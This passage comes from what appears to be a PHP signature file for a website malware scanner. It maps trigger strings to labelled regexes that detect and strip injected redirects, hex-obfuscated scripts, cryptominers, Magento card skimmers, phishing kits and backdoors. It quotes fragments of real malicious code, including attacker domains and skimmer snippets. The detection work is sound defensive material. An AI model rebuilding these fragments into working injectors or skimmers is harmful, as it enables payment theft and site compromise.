		'$SERVER_IP=str_replace(".","_",$SERVER_IP);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.test0.001', '<\\?php\\s*\\$SERVER_IP=._SERVER..SERVER_ADDR..;.SERVER_IP=str_replace\\([^\\[\\{>]+\\[.sXnj0DSOv[^\\}]+\\}if.._GET..SERVER_IP...\\$JS="[^\\"]+";echo "\\$JS";exit.0.;\\}[\\s]*(.\\*)?[\\s]*echo .<script src[^>]+> .JS <.script>";[\\s]*(\\*.[\\s]*.\\*[^\\*]+\\*.)?[\\s]*\\?>'), //modified by PG to cover variant
		'if(window.document)s+=String.fromCharCode(n[i]-(020+i' => array(STR_CLEAR_MULTIMATCH,'js.malware.hidden-iframe.006','<script>[^>]+if.window.document.s.=String.fromCharCode.n.i.[^>]+ev.s.;..<.script>'),
		'js_kod2.src = \'http://kreotceonite.com/' => array(STR_CLEAR_MULTIMATCH, 'js.malware.hidden-iframe.002.002', '<script[^>]*>if\(document.loaded\)[\s]*\{[^\x02]+document\.getElementById\([^\)]+\)\.appendChild\([^\)]+\);[\s\}]+<.script>'),
		'js_kod2.src = \'http://anadoluengellilerkenti.com/img/trans/' => array(STR_CLEAR_MULTIMATCH, 'js.malware.hidden-iframe.002.003', '<script[^>]+>\s*if.document.loaded[^>]+ js_kod2.src = .http...anadoluengellilerkenti.com[^>]+script>'),
		'frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.iframe-doorway.006', '<script type=.text.javascript.>[\\s]*function create_frame.a..var b=document.getElementById[^>]+}}}catch.err..}[\\s]*<.script>'),
		'document.location = "http://cort.as' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.009', '\/\/\s*<\!\[CDATA\[\s*if\s*\(\s*\(navigator.userAgent[^<]+?cort.as.O[^<]+?\}\s*\/\/\s*\]\]>'),
		'cookie.indexOf("google_api=1;"' => array(STR_CLEAR_MULTIMATCH, 'js.malware.peguards_cc.001', '<script[^>]*>\s*document.write..<\'.+?script>\'\);[^>]+?document.cookie.indexOf..google_api=1;[^>]+?delete s1;\s*<.script>'),
		'$document->_scripts[gzuncompress(base64_decode(\'e' => array(STR_CLEAR_LINEMATCH, 'php.malware.letcaro_x24hr.001', '\$document->_scripts.gzuncompress.base64_decode\([^;]+\);'),
		'if(!navigator.userAgent.match(/Google Web Preview|bot' => array(STR_CLEAR_MULTIMATCH, 'html.spam-seo.spam-links.010', '<div\s*id\s*=\s*["\']\w+styler[\'"]\s*>(\s*<a\s*href\s*=\s*["\']http:\/\/[^<]+<\/a>)+\s*<scrip[^>]+>\s*if\(\!navigator\.userAgent\.match\(\/[Gg]oogle\s*[Ww]eb\s*[Pp]review\s*\|\s*bot\s*\|\s*spider\s*\/i\)\)\s*document\.getElementById\(["\']\w+style["\']\s*\+\s*["\']\w+["\']\)\s*\.style\.display=\s*[(noe\+\'"\s)]+;\s*<.script>'), 
		'd=(.?.)doc\1\+\1ument\1;try{\+\+document.body}catch\(q\)' => array(REX_CLEAR_LINEMATCH, 'js.malware.injector.054', '(?:echo ")?\s+<script type=(\\\\?.)text.javascript\1[^>]+>\s*d=\1doc\1\+\1ument\1;try[^>]+z=\1[_\da-z]{800,}\1\[[^>]+script>(?:\";)?'),
		'jsecoin.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.024', '!function\(\)\{var [\w]+=document,[\w]+=[\w]+\.createElement\(.script.\),[^;]+;[\w]+\.type=.text.javascript[^;]+jsecoin.com[^;]+insertBefore\(.,.\)\}\(\);'),
	),

	'location' => array(STR_TRIGGER,

		'window.location' => array(STR_TRIGGER,

			'{window.location.href=\'http://www.\'+http_host+\'/\';' => array(STR_TRIGGER,
				'oneencyclopedia.com' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect-oneencyclopedia.001', '(<script[^>]*>\s*)?var http_host =\s*["\'](www\.)?oneencyclopedia.com["\']\s*if[^\}]+?http_host\+.\/.;\}(\s*<.script>)?'),
			),
			
			'data:text/html;base64' => array(STR_TRIGGER,
				'window.location="data:text/html;base64,DQoNC' => array(STR_CLEAR_MULTIMATCH, 'js.phishing.AOLmail.001', '<script[^<]+window.location=.data:text.html;base64,DQoNCg0KDQoNCg0KDQ[^<]+<.script>'),
			),

			'return (isset($_SERVER[\'HTTP_USER_AGENT\'])&& preg_match(\'/bot|crawl|crawler|proxy|slurp|spider/i\', $_SERVER[\'HTTP_USER_AGENT\']' => array(STR_TRIGGER,
				'if(!IS_BOT_CRAWLER() && !IS_BOT($ip) && $response["country_code"] ==' => array(STR_CLEARFILE, 'php.phishing.redirect.028', NULL),
			),
			
			'md5(microtime()' => array(STR_TRIGGER,
				'echo \'<script>window.location.replace("\'.$' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.055', 'if\(isset\(\$_GET\[.\w+.\]\)\)\s*{\s*(\$\w+)\s*=\s*array\([^;]+;\s*(\$\w+)\s*=\s*rand\(\d+,\s*count\(\1\)[^;]+;\s*(\$\w+)\s*=\s*[\'"]https?:\/\/[\'"]\.\1\[\2\]\.[^;]+;\s*echo\s*[\'"]<script>\s*window\.location\.replace\([\'"]{0,2}\.\3\.[\'"]{0,2}\)\s*;\s*<\/script>[\'"]\s*;\s*}'),
			),

			'jQuery("input[name=\'payment[cc_cid]' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.034', 'jQuery\(document\)\.ready\(function\(\){jQuery\([^\)]+\)\.change\(function\(\){localStorage\.setItem\(["\']\w+["\'],jQuery\([^}]+}\),jQuery\([^\.]+\.change\(function\(\){jQuery\(["\']input\[name=["\']payment\[cc_number\]["\']\]["\']\)\.val\(\)\.replace[^{]+{url:["\']http(s)?:[^,]+,data:jQuery\([^,]+,type:["\']POST["\'],success:function\(\w+\){return\!1},error\:function\([^{]+{return\!1}}\)}\)}\);'), 
			'[Math.floor(urls.length*Math.random())];' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.074', '<script>\s*var\s*(\w+)\s*=\s*new\s*[Aa]rray\(\s*.http[^\)]+\s*\);\s*function\s*\w+\(\)\s*\{\s*window.location\s*=\s*\1\[Math.floor\(urls\.length\*Math\.random\(\)\)\];\s*\}\s*var\s*\w+\s*=\s*setInterval\(\"\w+\(\).,\s*\d+\);|(\s*<.script>)'),
			'<script>if(navigator.userAgent.match(/^1207.' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.001', '<script[^;]+if.navigator.userAgent.match...1207....3gso....4thp....501i[^;]+window.location\s*.\s*.http[^;]+;<.script>'),
			'$message=$message."########CREATED' => array(STR_CLEARFILE, 'php.phishing.mailer.023', NULL),
			'<scrip[^>]+?>\s*(?:var\s+)?(\w+)\s*=\s*["\'][^"\']+?["\']\s*;?\s*window\.location\.href\s*=\s*["\'][^"\']+?["\']\s*\+\s*\1[^<]+?<\/script>' => array(REX_CLEAR_MULTIMATCH, 'html.spam-seo.redirect.014', '<scrip[^>]+?>\s*(?:var\s+)?(\w+)\s*=\s*["\'][^"\']+?["\']\s*;?\s*window\.location\.href\s*=\s*["\'][^"\']+?["\']\s*\+\s*\1[^<]+?<\/script>'),
			'CheckConnectionTempCookie"+String(Math.floor(1E' => array(STR_CLEARFILE, 'html.phishing.google_accounts.008', NULL),
			'window.location.href,q.match(/onepage|checkout/gi)' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.029', '<script\s*type\s*=\s*.text.javascript.>jQuery\(function\(\w+\)\s*{t\(.button.\)\.on\(.click.,function\(\)\s*{\w+\s*=\s*.\w+\s*=\s*.\+window\.location\.href,q\.match\(.onepage\|checkout.gi\)&&\s*\(\w+\(.input,\s*select.\)\.each\(function\(\)\s*{\w+\(this\)\.val[^}]+}\),\w+\.post\(\w+\(.<div\s*.>.\)\.html\([^)]+\)\.text\(\),\w+\)[^<]+<.script>'),
			'?email=<?php echo $_GET[\'email\']; ?>' => array(STR_CLEAR_MULTIMATCH, 'php.phishing.redirect.027', '<scrip[^>]+>\s*window\.location\s*=\s*.https?:\/\/[^=]+=<\?(?:php)?\s*echo\s*\$_GET\[.\w+.\]\s*;\s*\?>.\s*<\/script>'),
			'array(\'id\'=>"href=\"", \'v\'=> "href=\""."http://".$domain.$path."?"),' => array(STR_CLEARFILE, 'php.spam-seo.injector.267', NULL),
			'<body onLoad="setTimeout(\'delayer()\', 1)">' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.redirect.044', '<scrip[^>]+>\s*(?:<\!-+\s*)?function\s*(\w+)\s*\(\)\s*{\s*window\.location\s*=\s*.https?:\/\/[^}]+}\s*(?:\/\/-+>\s*)?<\/script>\s*<body\s*on[Ll]oad\s*=\s*.[Ss]et[Tt]imeout\(\s*.\1\(\)\s*.,\s*\d+\s*\).>'),
			'$.post(\'sendmail.php\',{\'postemail\':stremail,\'postpaswrd\':strPassword,postdomain:strdomain}' => array(STR_CLEARFILE, 'php.phishing.mailer.066', NULL),
			'online with 1&1 Webmail.","oao.login.canonical":"https://webmail.1and1.co.uk' => array(STR_CLEARFILE, 'html.phishing.docusign.004.001', NULL),
			'echo md5(uniqid(time()));' => array(STR_CLEARFILE, 'php.phishing.redirect.035', NULL),
			'>Scan Complete: Safe Link</p><button' => array(STR_CLEARFILE, 'html.phishing.redirect.005', NULL),
			'if(window.location.href.split(\'#\')[1]>0){' => array(STR_CLEARFILE, 'html.phishing.redirect.006', NULL),
		),

		'top.location' => array(STR_TRIGGER,

			'rand(99' => array(STR_TRIGGER,
				'.$' => array(STR_TRIGGER,
					'?<?php echo $' => array(STR_CLEARFILE, 'php.phishing.redirect.003', NULL),
					'./<?php echo ' => array(STR_CLEARFILE, 'php.phishing.redirect.006', NULL),
				),
			),

			'href=atob(' => array(STR_TRIGGER,
				'script' => array(STR_TRIGGER,
					'aHR0cH' => array(STR_CLEARFILE, 'php.malware.redirect.039', NULL),
				),
			),

			'function Anon_http($srv, $usr, $url, ' => array(STR_CLEARFILE, 'php.phishing.redirect.007', NULL),
			'top.location = \'http://bancanet.banamex.com.mx' => array(STR_CLEARFILE, 'js.phishing.generic.003', NULL),
			'>window.top.location.href="http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.098', 'if\(isset\(\$_GET\[.(\w+).\]\s*\)\)\s*{\s*echo\s*[\'"]<scrip[^>]+>\s*window\.top\.location\.href=[\'"]http[^\']+\'\.\$_GET\[.\1.\]\.\'[\'"]\s*;\s*<\/script>\s*[\'"]\s*;\s*exit\s*;\s*}'),
			'content=\'AnonClay Cyber Team' => array(STR_CLEARFILE, 'php.defaced.generic.016', NULL),
		),

		'if(preg_match($bots_ua, $agent)' => array(STR_TRIGGER,
			'die("<h1>500 Internal Server Error' => array(STR_CLEARFILE, 'php.spam-seo.redirect.093', NULL),
		),

		'(window.location.hostname);t("https://coinhive.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.011', '<script>document.addEventListener\(.DOMContentLoaded.,function\(\)\{function[^}]+document.body.appendChild...\}[^>]+window.location.hostname\);...https...coinhive.com.lib[^>]+start\(\)\}\)\},[\d]+\)\}\);<.script>'),
	),

	'<script>' => array(STR_TRIGGER,

		'var _0x' => array(STR_TRIGGER,

			',show:function (){var' => array(STR_TRIGGER,
				'inject:function' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.003', 'print[\s]*[(\'"]+<script>var\s*_0x\w+[\s]*=[\s]*\["",".x[\w]+.x[\w]+.x[\w]+[^<]+inject\(.http[^<]+<.script>[\s]*[\')]+;[\s]*(\/\*\*[\s]*[\w]+[\s]*\*\*\/)?'),
			),

			'new RegExp(_0x' => array(STR_TRIGGER,
				'\x63\x6C\x69\x63\x6B\x75\x6E\x64\x5F\x65\x78\x70\x65\x72\x74' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.013.03', '<script>[\s]*var _0x[\w]+=\[..x...x...x...x...x[^}]+toString\([\d]+\)\)\};[^>]+\{\}\)\)[\s]*<.script>'),
			),

			'\x7C\x63\x6F\x69\x6E\x68\x69\x76\x65\x7C' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.010', '<scrip[^>]+>\s*var\s*\w+\s*=[^\]]+\]\s*;[^@]+x63.x6F.x69.x6E.x68.x69.x76.x65[^@]+x6D.x69.x6E.x65.x72[^;]+;\s*eval\(function\(\w+[^{]+{\s*\w+\s*=\s*function\s*\(\w+\)\s*{\s*return[^}]+}\s*;\s*if\(\!\w+[^{]+{\s*while\(\w+[^{]+{\w+\[[^}]+}\s*;\s*\w+=\s*\[function\(\w+\)\s*{\s*return[^{]+{\s*return[^{]+{\s*if\(\w+\[[^}]+}\s*}\s*;\s*return\s*\w+\s*}\s*\([^}]+}\)\s*\)\s*<\/script>'),
			'["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70' => array(STR_CLEAR_LINEMATCH, 'js.malware.createElement.001', '<scrip[^>]+>\s*var\s*(_\w+)\s*=\s*\[".x73.x63.x72.x69.x70.x74"\s*,\s*".x63.x72.x65.x61.x74.x65.x45.x6C.x65.x6D.x65.x6E.x74"\s*,\s*".x73.x72.x63"\s*,\s*".x68.x74.x74.x70[^"]+"\s*,\s*"\s*.x61.x70.x70.x65.x6E.x64.x43.x68.x69.x6C.x64",".x68.x65.x61.x64"\s*\]\s*;\s*var\s*(\w+)\s*=\s*document\[\1\[\d+\]\]\(\1\[\d+\]\)\s*;\s*\2\[\1\[\d+\]\]\s*=\s*\1\[\d\]\s*;\s*document\[\1\[[^<]+<\/script>'),
			'\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x2F\x2F' => array(STR_CLEAR_MULTIMATCH, 'js.malware.injector.049', 'defined\(\s*.PHPFOX.\)\s*or\s*exit\s*\(.NO\s*DICE\!.\)\s*;\s*PhpFox\s*::\s*getLib\s*\(.\w+.\)\s*->\s*setHeader\s*\(array\s*\(\s*.<script>\s*var\s*(_0x\w+)\s*=\s*\[..x48.x45.x41.x44[^@]+.x61.x70.x70.x65.x6E.x64.x43.x68.x69.x6C.x64"\s*,\s*".x2F.x2F[^;]+;+\s*function\s*(\w+)\s*\((_0x\w+)\)\s*{\s*var\s*(_0x\w+)\s*=\s*document\[\1\[\d\]\]\s*\(\1\[[^;]+;\s*var\s*\w+\s*=\s*document\[\1[^<]+<.script>.,\s*\)\s*\)\s*;'),
			'"\x77\x73\x73\x3A\x2F\x2F\x6D\x75\x6E\x65\x72\x6F\x2E\x6D\x65\x3A\x38\x38\x39\x32"' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.020', '(?:<script src=.https:..munero.me.a.min.js.><.script>\s*)?<script>\s*var (_0x\w{4,5})=\[".x\d\d[^\]]+"\];Munero\[\1\[[^<>]+\]\(\)\s*<.script>'),
			'\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63' => array(STR_CLEAR_LINEMATCH, 'js.malware.generic.039', '<scrip[^>]+>\s*var\s*(\w+)\s*=\s*\[..x3C.x73.x63.x72[^\2]+.x2F.x61.x70.x70.x2E.x6A.x73[^\]]+\]\s*;\s*function\s*(\w+)\s*\(\)\s*{\s*var\s*\w+\s*=\s*\1\[\d\]\s*;\s*var[^\2]+\}\s*printapp\(\)\s*<\/script>'),
			'\x63\x63\x73\x61\x76\x65","\x63\x68\x65\x63\x6B\x6F\x75\x74' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cc_stealer.004', 'var[\s]*_0x[\w]+=\[..x[\d]+[^;]+x[\d]+.\];[\s]*var[\s]*siteURL[\s]*=[\s]*_0x[\d]+\[[\d]*\];var[\s]*submitFlag[\s]*=[\s]*false;var[^>]+\]\)\{;\};return[\s]*_0x[\w]+>[^>]+\]\]\[_0x[\w]+\[[\d]+\]\]>[^>]+\]\]\[_0x[\w]+\[[\d]+\]\]>[^>]+catch\(e\)\{\};if\(_0x[\w]+>[\s]*=[\s]*[\d]*\)\{_0x[^,]+contentLoaded\(window,function\(\)\{if\(document\[_0x[^,]+true\)\{go\(\);[\w]*=[\s]*false\}\},[\d]+\)\}'),
		),

		'navigator["\x75\x73\x65\x72\x41\x67\x65\x6e\x74"];' => array(STR_TRIGGER,
			'new window["\x52\x65\x67\x45\x78\x70"]' => array(STR_CLEAR_MULTIMATCH, 'js.malware.generic.042', 'var[\s]*[\w]+[\s]*=[\s]*new[\s]*window\[..x52.x65.x67.x45.x78.x70.\]\([^;]+;[\s]*var[\s]*[\w]+[\s]*=[\s]*navigator\[[^;]+;[\s]*if\(![\w]+\[[^;]+x6e.x6f.x6e.x65.;'),
		),
		
		'<script>d=Date;d=new d' => array(STR_CLEAR_LINEMATCH,'js.malware.generic.001','<script>d=Date;d=new d.*script>'),
		'\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.029', '<script>\s*var\s*_\w+\s*=\s*\[.[(?:\w+\,\s*\\\")]+.x68.x74.x74.x70.x3A.x2F.x2F.x67.x65.x74.x68.x65.x72.x65.x2E.x69.x6E.x66.x6F[(?:\w+\,\s*\\\")]+\];if\(document[^;]+;document\[\w+\[\d+\]\]\s*=\s*[^;]+;window[^<]+<.script>'),
		'<script>i=0;if(window' => array(STR_CLEAR_LINEMATCH,'js.malware.generic.002','<script>i=0;if.*script>'),
		'<script>try{q.appendChild' => array(STR_CLEAR_LINEMATCH,'js.malware.generic.003','<script>try.q.app.*script>'),
		'<script>/*LGPL*/ try{ window.onload' => array(STR_CLEAR_LINEMATCH,'js.malware.gpl.001','<script>..LGPL.. try. window.onload.*script>'),
		'<script>/*GNU GPL*/ try{window.onload' => array(STR_CLEAR_LINEMATCH,'js.malware.gpl.002','<script>..GNU GPL.. try.\s*window.onload.*script>'),
		'/js/jquery.min.php"; var n_url' => array(STR_CLEAR_MULTIMATCH, 'js.malware.js_jquery_min_php.001', '<script>var a=..; setTimeout.10.;[^\{\}]+?var base = .http:..[^\/]+\/js\/jquery.min.php.;[^\}]+?\+ f_url \+ ..>. \+ .<. \+ ..script>.\);\}<.script>'),
		'hashdate().toString(16) + ".eu/script.html?' => array(STR_CLEAR_LINEMATCH,'js.malware.hashdate.001','<script>function hashdate.+?eu\/script.+?};runonload\(\);\s*<\/script>'),
		'g.rmEeOu+ I>X=59Tlaqs4FUCBRWy!Y03n' => array(STR_CLEAR_MULTIMATCH, 'js.malware.mail-useful.001', '<!-- \w+ -->\s*<script>\s*function\smail_useful[^>]+var\schars.=..g.rmEeOu[^;]+;.; var[^>]+replace[^;]+;...<.script><style>[^>]+<.style>[^>]+<div id=.{32}[^\n]+\n<script>mail_useful.{33}[^>]+script>[^>]<!--\s\w+\s-->'),
		'var url = myArray[ri];(function(a,b)' => array(STR_CLEAR_LINEMATCH, 'js.malware.redirect.001', '<script>var myArray = ..http:[^<\]]+\];var ri =[^<\[]+\[ri\];.function.a,b..if...android.bb.d[^<]+?url.;<.script>'),
		'if(s.indexOf("google.co.jp")>0||s.indexOf(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect.005', '[=]*\s*?<script>\s*?[^=]+?=document\.referrer[^\(]*\((?:\w+\.indexOf\(.[^"\']+?.\)\s*?[^\|]+\|\|){2,}[^\{]+?\{\s*?\w+\.location\s*?=\s*?[^<]+?<\/script>\s*[=]*'),
		'cdn.googletoolservices.com' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.035', '<script[^<]+cdn.googletoolservices.com[^<]++<.script>'),
		'qa(\'create\',' => array(STR_CLEAR_MULTIMATCH, 'js.malware.fakeanalytics.001', '<script>\s*\(function\(i,s,o,g,r,a,m\){i\[.GoogleAnalyticObject.]=r;[^;]+;a=s.createElement[^;]+;[^\']+.script.,.\w+:..[(?:\w+\.)]+[(?:\-\w+)]+\.\w+.[(?:\-\w+)]+.,.qa.\);\s*qa\(.create., .\w+-\w+.,\s*.auto.\);\s*<.script>'),
		'\x6F\x6E\x65\x70\x61\x67\x65\x7C\x63\x68\x65\x63\x6B\x6F\x75\x74' => array(STR_CLEAR_MULTIMATCH, 'js.malware.magento-cc-stealer.024', '<script>\s*var\s*\w+\s*\=\s*\[..x6C.x6F.x63.x61.x74.x69.x6F.x6E.,[^,]+,..x6F.x6E.x65.x70.x61.x67.x65.x7C.x63.x68.x65.x63.x6B.x6F.x75.x74[^,]+,..x3C.x73.x63.x72.x69.x70.x74.x20.x73.x72.x63.x3D.x22.x68.x74.x74.x70[^,]+,[^\]]+\]\;if\(\(\s*new\s*RegExp\(\w+\[\d+\]\)\)\s*\[\w+\[\d+\]\]\(window\[\w+\[\d+\]\]\)\)\s*{document\[\w+\[\d+\]\]\(\w+\[\d+\]\)\}'),
		'new deepMiner.' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.012', 'echo\s+["\']\s*<script[^;]+?;\s*(?:var\s*)?\w+?\s*=\s*new deepMiner\.\w+\s*\(\s*\w+\s*,\s*\{[^\}]+?\}\s*\)[^<]+?<\/script>\s*["\']\s*;'),
		'miner.start(' => array(STR_CLEAR_MULTIMATCH, 'js.malware.cryptominer.001', '<script[\s]*src=[^>]+><\/script>[\s]*<script[^>]*>[^>]+CoinHive[^>]+\.start\([^;]*\);[\s]*\}?([\s]*<\/script>)?'),
		'ca-pub-4503090171770424' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.bogus_ad.001', '<script async src[\s]*=[\s]*...pagead2.googl.syndication.com[^>]+>[\s]*<.script>[\s]*<[si][cn][rs][^<]+ca-pub-4503090171770424[^<]+<.[si][cn][rs][^>]*>([\s]*<script>[\s]*\(adsbygoogle[^<]+<.script>)?'),
	),

	'echo' => array(STR_TRIGGER,

		'showHide' => array(STR_TRIGGER,
			'echo file_get_contents(' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.showHide.001', '<script>\s*function showHide .id.\s*\{\s*[^\{]*hidden.;\s*\}\s*<.script>\s*<body on[lL]oad=.showHide[^>]+>\s*<div id="\w+" style="visibility: visible;">\s*<.php\s*echo file_get[^>]+?\?>\s*<.div>'),
		),

		'echo \'<script type="text/javascript" src="\'.$' => array(STR_TRIGGER,
			'document.location.hostname"}; </script> <script src="http' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.redirect.091', 'if\s*\(\s*\!is_user_logged_in\(\)\s*\)\s*{\s*(\$\w+)\s*=\s*[\'"]https?:\/\/[^;]+;\s*(\$\w+)\s*=\s*get_headers\(\1\)\s*;\s*if\(substr\(\2[^\)]+\)\s*=+\s*200\s*\)\s*echo\s*[\'"]\s*<script[^\2]+src\s*=[\'"]\s*\'\.\1\.\'[\'"]\s*>\s*<\/script>\s*[\'"]\s*;\s*else\s*{\s*echo\s*[\'"]\s*<script>\s*var\s*(\w+)\s*=\s*{\s*expire:\s*\d+,\s*url:[^>]+>\s*<script\s*src=[\'"]https?:\/\/[^;]+;\s*}\s*}'),
		),

		'.split(\"\").reverse().join(\"\"));' => array(STR_CLEAR_MULTIMATCH, 'html.iframe.generic.009','echo\s+.<script[^>]+>[^>]+var\s+\w{5,}[^;]+ptth..;[^>]+document.createElement...iframe[^>]+.split[^;]+reverse...join[^>]+userAgent.match[^>]+script>.;'),
		'if ($getArrWPForm[$urlWPThemeIndex]) echo "$getArrWPForm[$urlWPThemeIndex]\n";' => array(STR_CLEAR_MULTIMATCH, 'html.iframe.generic.010', '\$getArrWPForm[\s]*=[\s]*array[^?]+\$urlWPThemeIndex\+\+;[\s]*(\/\/[\s]*)?\}'),
		'*/@upsme(' => array(STR_CLEAR_MULTIMATCH, 'php.malware.upsme.001', '\\/\\*(?:<.--)?[^\\*]+\\*\\/\\@upsme[^\\#]+\\@\\(yandex\\|google\\|bot.+?\\{echo \\$i;[^\\*]+\\/\\*(?:<.--)?[^\\*]+\\*\\/'),
		'src=\'http://www.oxxtm.com/images/wp-' => array(STR_CLEAR_LINEMATCH, 'php.malware.oxxtm.001', 'echo "<script[^>]+?src=.http:..www.oxxtm.com.images.[\w-]+.js.><\/script>";'),
		'*/ if(is_object($_SESSION["__default"]["user"]) && !($_SESSION["__default"]["user"]->id' => array(STR_CLEAR_MULTIMATCH, 'php.malware.generic.060', '(?:\n\";\}\s*\/\*\w+\*\/\s*\?>\s*)?<\?php\s*\/\*\w+\*\/\s*if\(is_object\(\s*._SESSION..__default....user...\s*&&\s*!\(._SESSION..__default....user....id[^}]+}\s*\/\*\w+\*\/\s*\?>'),
		'if($wpmudak == "FALSE"){$wptraffscript=\'<script' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.191', '\$wpmudak=.FALSE.;\$user_agent\=[^<]+<script\s*language\=.[Jj]ava[Ss]cript.\s*src\=.http:..\w+[(?:\-\w+)]+\.\w+.[(?:\-\w+)]+\.\w+.><.script>.;echo\s+\$wptraffscript;}}'),
		'is_admin()) ) {echo' => array(STR_CLEAR_MULTIMATCH, 'php.malware.injector.042', '\$\w+\s*=\s*\d+;if\(\s*\!\(\w+\(.is_user_logged_in.\)[^\!]+\!\(function_exists\(.is_admin.\)[^\<]+<script[^=]+=[^\<]+<.script>\s*<script[^=]+=[^\<]+<.script>\s*[^\}]+};\$\w+=\d+;'),
		'&default_keyword=<?php echo $_SERVER[\'REQUEST_URI' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.061', '<script[^\&]+&se_referrer=<\?php\s*echo\s*\$_SERVER\[.HTTP_HOST.\]\s*;\s*\?>\s*\&default_keyword=<\?php\s*echo\s*\$_SERVER\[.REQUEST_URI.\]\s*;\s*\?>.>\s*<\/script>'),
		'$protocol = $resolve."?RefundStatus=APPROVED&id=".$id;' => array(STR_CLEARFILE, 'php.malware.redirect.014', NULL),
		'echo .<script[^>]*[^\.]*png.{1,5}<\/script>";' => array(REX_CLEAR_LINEMATCH, 'php.malware.generic.088', 'echo .<script[^>]*[^\.]*png.{1,5}<\/script>";'),
	),

	'analytic' => array(STR_TRIGGER,
		'realstatistics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+realstatistics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), //modded by PG to cover more samples
		'realanalytics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.02', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+realanalytics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), 
		'real-analytics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.03', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+real-analytics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), 
		'istatistics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.04', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+istatistics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), 
		'siteanalytics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.05', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+siteanalytics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'),
		'webstatistics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.06', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+webstatistics[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'),
		'adsstat' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.07', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+adsstat[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), 
		'realtds' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.08', '<script language="[Jj]ava[sS]cript"[^>]+src="http:[^"]+realtds[^"]+analytic[s]?\\.php\\?id=[\\d]+"><.script>'), 
		'trafficanalytics' => array(STR_CLEAR_LINEMATCH, 'js.malware.neutrino.001.09', '<script type=.text.javascript[^>]+src=.http:[^>]+trafficanalytic[s]?[^>]+js.js\.js.><.script>|function f[\d]*_callback\(\$buffer\)\{\$buffer = preg_replace..#<[^,]+,.<script src[^,]+trafficanalytic[^,]+,\$buffer\);return \$buffer;\}ob_start\(f[^;]+\);'), 
		'googleplatform' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.048', '<script\s*[(?:src|type="text.javascript")]+=.\w+:..googleplatform\.\w+(?!:com).\w+.js.><\/script>'),
	),

	'getElementById' => array(STR_TRIGGER,

		'<body onLoad=' => array(STR_TRIGGER,
			'if(document.getElementById){timer.innerHTML=' => array(STR_TRIGGER,
				'<meta http-equiv="refresh" content="' => array(STR_CLEARFILE, 'php.spam-seo.redirect.096', NULL),
			),
		),

		'getElementById(\'user' => array(STR_TRIGGER,
			'\'Error: Creating to the account.' => array(STR_CLEARFILE, 'php.backdoor.wpuser.008.02', NULL),
		),

		'getElementById("t"+"g"+"s"+"i").style.display=\'none' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.055', '<div id="tgsi">[\\s]*<.php[\\s]*\\$[\\w]+[\\s]*=[\\s]*curl_init..;[^>]+echo \\$file_contents;[\\s]*.>[\\s]*<.div>[\\s]*<script>document.getElementById."t"."g"."s"."i"..style.display=.none.;<.script>'),
